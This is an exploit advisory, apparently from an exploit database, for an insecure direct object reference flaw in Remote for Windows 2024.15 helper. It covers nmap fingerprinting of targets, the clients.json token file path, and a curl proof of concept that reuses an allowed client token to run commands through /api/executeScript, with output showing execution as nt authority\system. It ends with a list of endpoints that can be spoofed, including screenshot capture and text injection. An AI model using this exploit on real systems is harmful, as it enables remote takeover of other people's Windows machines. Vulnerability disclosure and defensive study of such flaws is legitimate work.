# Exploit Title: Remote for Windows 2024.15 (helper) - Insecure # Exploit Title: Remote for Windows 2024.15 (helper) - Insecure Direct
Object Reference (IDOR)
# Date: 2025-06-13
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)



# Identification:
nmap -p- -T4 <target> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US


Vulnerability Summary
Remote for Windows Helper 2024.15 contains an Insecure Direct Object
Reference (IDOR) vulnerability. Attackers can access privileged API
functions by reusing any "Allowed" client token from clients.json without
authentication, leading to full system compromise.

"C:\Windows\System32\config\systemprofile\AppData\Roaming\Remote for
Windows\clients.json"

[
{
"Identifier": "1337",
"Name": "attacking",
"Model": "iPhone",
"Allowed": false,
"LastAccess": 1749763038698
},
{
"Identifier": "8F5E0017-408E-4996-B698-0BB93D022409",
"Name": "iPhone",
"Model": "iPhone10,5",
"Allowed": true,
"LastAccess": 1749807277127
}
]

POC:

curl -k -X GET "https://192.168.8.105:49988/api/executeScript" -H
"X-ClientToken: 8F5E0017-408E-4996-B698-0BB93D022409" -H "X-HostName:
apple iMac" -H "X-HostFullModel: iMac17,1" -H "X-Script: whoami" -H
"X-ScriptName: exploit" -H "X-ScriptDelay: 0" | jq
% Total % Received % Xferd Average Speed Time Time Time
Current
Dload Upload Total Spent Left
Speed
100 48 100 48 0 0 206 0 --:--:-- --:--:-- --:--:--
206
{
"result": "nt authority\\system\r\n",
"error": ""
}


All endpoints are vulnerable to token spoofing:

/api/listApps
/api/rightMouseClick
/api/middleMouseClick
/api/executeScript
/api/listPendingScripts
/api/listCustomActions
/api/leftMouseStatus={0,1}
/api/cancelPendingScript=<id>
/api/getCursorLocation
/api/getScreenshot
/api/enterString=<text>
/api/getActionIcon=<icon>
/api/appIcon=<path>
/api/setInputSource=<source>